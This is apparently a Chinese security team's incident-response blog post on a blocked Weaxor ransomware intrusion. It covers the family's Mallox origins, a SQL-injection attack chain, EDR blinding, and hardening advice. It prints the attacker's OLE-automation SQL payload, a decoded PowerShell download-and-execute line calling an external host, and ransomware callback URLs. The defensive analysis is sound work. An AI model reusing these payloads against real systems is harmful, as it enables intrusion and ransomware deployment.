【紧急警示】一次成功阻断Weaxor勒索病毒家族加密之路
【紧急警示】一次成功阻断Weaxor勒索病毒家族加密之路
原创 solarsec solar应急响应团队 2025-06-10 08:17
在我们对5月份处理的各类勒索病毒入侵事件统计中,Weaxor勒索家族
依然位列入侵频率最高的家族之一。本月观测到的新变种已出现扩展名变化,后缀包括.weax
和.wxx
,与4月活跃的变种有所不同,显示该家族在持续进行更新与变种迭代。
本次分享的案例源于我们在为某客户提供安全运营服务期间捕获的一次典型入侵事件。由于客户业务特殊,系统仅在节假日开放外网映射,但因存在多处在野高危漏洞,系统一经暴露便迅速遭受了Weaxor家族的攻击。接下来,我们将重点介绍本次事件的阻断过程及在此基础上总结的防护优化方法,供大家参考。
1. 勒索病毒组织介绍
Weaxor家族在2024年11月首次现身,该勒索病毒会将“.rox”扩展名附加到受感染文件的名称后,并留下名为“RECOVERY INFO.txt”的勒索信。信中包含了Weaxor家族的暗网地址,受害者可以通过该地址进入一个一对一的聊天界面,其他人无法访问。值得注意的是,暗网地址的首页为空白,这一设计显得格外耐人寻味。
一对一聊天界面
首页
1.1 疑似mallox源码修改
此加密器与mallox家族极其相似,疑似为mallox源码修改之后编译得到,mallox具体分析请参考文章【病毒分析】Mallox勒索家族新版本:加密算法全面解析
相似之处
1.都为不加密固定的五个语言俄语、哈萨克语、白俄罗斯语、乌克兰语和土库曼语;
2.都调整电源计划为高性能模式;
3.删除的注册表内容一致;
4.密钥生成和加密算法基本一致,但是rox在生成随机数的情况下又再次生成了0x38个字节的随机数,修复了mallox会被破解出密钥的情况;
5.信息回传的格式,以及url极其相似,mallox url如下:
http://193.106.191.141/QWEwqdsvsf/ap.php
rox url如下:
http://193.143.1.139/Ujdu8jjooue/biweax.php
不同之处
1.rox未对关机键进行隐藏;
2.获取文件方式不同,mallox获取文件方式为遍历文件,然后通过完成端口将文件提交到队列中,加密线程通过队列获取文件,而rox则是通过一个全局列表来传输;
3.rox开启了较高的编译优化,而malllox则没有。
2. 勒索病毒样本分析
该勒索病毒样本的技术细节,我们已在此前发布的分析文章中进行了全面解读,欢迎回顾查看
【病毒分析】新崛起的weaxor勒索家族:疑似mallox家族衍生版,深度解析两者关联!
3. 攻击分析
5月31日12:11,我们在安全运营平台接收到客户主机离线告警。经确认,客户未进行任何操作,且服务器已处于断网状态。随后我们远程排查发现,客户部署的安全设备云查杀引擎异常断开,导致推送告警中断。针对这一情况,我们第一时间启动预警响应流程,向客户同步通报疑似遭受攻击的风险,并建议立即断开外网业务访问,配合后续进一步研判与溯源分析。
3.1 黑客攻击路线图
4. 溯源分析
4.1 溯源过程
注意:日志时间为 UTC+0 标准时间,中国标准时间为 UTC+8
1.【溯源分析过程】攻击者于 2025 年 5 月 31 日 12:05 第一次进行访问
图 1 攻击者首次访问
2.2025 年 5 月 31 日 12:07 攻击者利用 SQL 注入漏洞激活 OLE 自动化存储过程为后续通过 SQL Server 执行操作系统命令做准备
图 2 攻击者 SQL 注入攻击
3.2025 年 5 月 31 日 12:07 攻击者利用 SQL 注入漏洞执行PowerShell 从恶意网址 a.wersc.top 下载并执行远程代码
恶意请求分析: OLE自动化攻击流程
DECLARE@shellINT EXECsp_oacreate'wscript.shell',@shellOUTPUT EXECsp_oamethod@shell,'run',null,'sqlps-enc[BASE64]'
解码后的恶意Payload
IEX (New-ObjectSystem.Net.Webclient).DownloadString('http://a.wersc.top/abc')
4.2025年5月31日12:07攻击者上传恶意驱动试图关闭安全软件。
5.2025年5月31日12:08攻击者上传勒索病毒试图执行加密,已被安全软件阻止查杀。
4.2 溯源结果
攻击者此次攻击使用基于布尔盲注的SQL注入攻击,使用字符编码绕过简单过滤,经验证为该系统0day,已联系厂商进行修复。
攻击者于2025年5月31日12:05第一次进行访问,2025年5 月31日12:07攻击者利用SQL注入漏洞激活OLE自动化存储过程为后续通过SQLServer执行操作系统命令做准备,2025年5月31日12:07攻击者利用SQL注入漏洞(0day)执行PowerShell从恶意网址a.wersc.top下载并执行远程代码,2025年5月31日12:07攻击者上传恶意驱动试图关闭安全软件,2025年5月31日12:08攻击者上传勒索病毒试图执行加密,已被安全软件阻止查杀
4.3 流量阻断
黑客试图通过加载白驱动,劫持或阻断EDR(终端检测与响应)客户端与其云端服务之间的通信流量。攻击目标是切断EDR与管理服务器的数据交互,阻止威胁情报、终端行为日志及可疑样本的上传。通过这种方式,黑客意图削弱EDR的检测和响应能力,延缓安全团队对异常活动的感知和处置,从而为后续的横向移动、数据窃取或勒索加密操作创造更大的操作空间,
但由于我们提前接入了威胁信息告警,在流量阻断的第一时间接收到告警并进行应急响应处理
。
4.4 延伸科普
在成功实现EDR与云端服务器之间流量阻断之后,攻击者进一步升级攻击手段,部署具备致盲能力
的恶意驱动。该驱动不仅中断了agent与后台之间的威胁情报通信,还具备深度干扰和屏蔽能力,能够绕过EDR本地检测机制
,使其在不产生任何告警、不触发任何异常日志记录的情况下,完成对目标终端的数据加密操作。
具体而言,致盲驱动通过内核级钩子(Hook)或内存篡改等底层手段,拦截并篡改EDR的核心模块响应,导致EDR在面对进程注入、文件加密、服务禁用等典型恶意行为时,无法正常捕获行为特征或触发告警策略。由于EDR在表面上仍维持“运行正常”的假象,安全团队难以及时察觉终端被攻陷的事实,极大地延长了攻击者在系统中的潜伏与操作窗口。
整体来看,流量阻断与驱动致盲的组合策略,显著削弱了EDR的可见性与响应能力,实现了对终端环境的“静默失守”
,使勒索攻击具备更高的隐蔽性、持久性和破坏性。
5. 后续加固
1.后续,团队应急响应人员第一时间介入,迅速对受影响主机进行全面排查。通过全盘杀毒扫描,清理潜在的恶意软件,并重点检查系统计划任务、启动项及服务配置,排除可能存在的后门植入与异常自启动行为。同时,结合日志审计与内存取证,进一步确认系统当前状态,确保未留存任何可疑残留或隐蔽持久化机制。
2.随后,我们主动联系系统厂商,确认此次事件中相关漏洞的具体影响范围,获取官方修复建议与最新补丁版本。根据厂商提供的指导方案,协助客户完成系统漏洞修复与加固工作。修复完成后,团队组织多轮漏洞扫描与渗透测试,验证修复效果,确保漏洞已彻底封堵,系统恢复至安全稳定状态。同时,针对本次事件,协助客户更新安全基线配置,提升整体防护能力,防止类似攻击再次发生。
3.同时,我们同步联系安全防护软件厂商,详细反馈此次事件中发现的云查杀引擎致盲问题及相关技术细节。厂商技术团队在接到反馈后迅速响应,针对漏洞点进行修复和版本升级。我们协助配合完成修复版本的测试验证,确认新版本在功能完整性与防护能力上无异常,确保防护软件恢复正常工作状态,有效提升了客户环境的整体安全性和防御韧性。
6. 防范措施
6.1 升级与补丁
定期对操作系统、应用软件及安全防护产品进行补丁更新,修复已知漏洞,降低被勒索病毒利用的风险。建议建立补丁管理机制,确保关键系统优先更新,提升整体防护能力。
6.2 数据库账户最小权限原则
仅为应用分配最低权限数据库账户(禁止使用sa
等高权限账户);
禁止执行如xp_cmdshell
、sp_configure
等高危系统命令。
6.3 组件执行权限控制
禁止Web服务账户写入/执行权限访问系统关键目录(如C:\Windows\Temp);
限制 .jsp
、.aspx
等脚本扩展在上传目录中执行。
6.4 部署Web应用防火墙(WAF)
启用SQL注入、命令注入、远程代码执行等规则;
自定义规则过滤含有 UNION SELECT
、xp_cmdshell
、1=1
等敏感语句请求。
6.5 输入合法性校验
开启应用系统的表单字段白名单机制,限制输入内容长度、格式和字符集;
对特殊字符(如引号、分号、单双破折号等)进行过滤或转义。
以下是solar安全团队近期处理过的常见勒索病毒后缀:
勒索攻击作为成熟的攻击手段,很多勒索家族已经形成了一套完整的商业体系,并且分支了很多团伙组织,导致勒索病毒迭代了多个版本。而每个家族擅用的攻击手法皆有不同,TellYouThePass勒索软件家族常常利用系统漏洞进行攻击;Phobos勒索软件家族通过RDP暴力破解进行勒索;Mallox勒索软件家族利用数据库及暴力破解进行加密,攻击手法极多防不胜防。
|
|
相关文章 |
|
|
|
|
|
|
而最好的预防方法就是针对自身业务进行定期的基线加固、补丁更新及数据备份,在其基础上加强公司安全人员意识。
|
|
相关文章 |
|
|
【教程分享】勒索病毒来袭!教你如何做好数据防护 |
|
|
|
案例介绍篇
聚焦于真实的攻击事件,还原病毒家族的攻击路径和策略,为用户提供详细的溯源分析和防护启示;
|
|
相关文章 |
|
|
【案例介绍】赎金提高,防御失效:某上市企业两年内两度陷入同一勒索团伙之手 |
|
|
【成功案例】某集团公司的Phobos最新变种勒索病毒jopanaxye解密恢复项目
|
|
|
【成功案例】某集团公司的Phobos最新变种勒索病毒2700解密恢复项目
|
|
|
【成功案例】间隔数月双团伙先后利用某ERP0day实施入侵和勒索的解密恢复项目
|
|
|
【成功案例】利用多款国产内网渗透工具勒索数十台虚拟机的babyk解密恢复项目
|
|
|
【成功案例】RDP暴露引发的蝴蝶效应:LockBit组织利用MSF工具及永恒之蓝漏洞进行勒索入侵
|
|
|
【成功案例】lockbit家族百万赎金不必付!技术手段修复被加密的数据库,附溯源分析报告 |
漏洞与预防篇
侧重于技术层面的防御手段,针对病毒利用的漏洞和安全弱点,提出操作性强的应对方案:
|
|
相关文章 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
应急响应工具教程篇
重点分享应急响应过程中常用工具的安装、配置与使用说明,旨在帮助读者快速掌握这些工具的操作流程与技巧,提高其在实际应急场景中的应用熟练度与效率。
|
|
相关文章 |
|
|
|
|
|
【应急响应工具教程】取证工具-Volatility安装与使用 |
|
|
【应急响应工具教程】流量嗅探工具-Tcpdump
|
|
|
【应急响应工具教程】一款精准搜索文件夹内容的工具–FileSeek
|
|
|
【应急响应工具教程】一款自动化分析网络安全应急响应工具–FindAll |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
如果您想了解有关勒索病毒的最新发展情况,或者需要获取相关帮助,请关注“solar专业应急响应团队”。
全国热线|400-613-6816
更多资讯 扫码加入群组交流
喜欢此内容的人还喜欢
【紧急警示】Weaxor最新变种“.wxx”来袭,批量入国内知名财务类管理系统发起勒索攻击!
索勒安全团队
索勒安全团队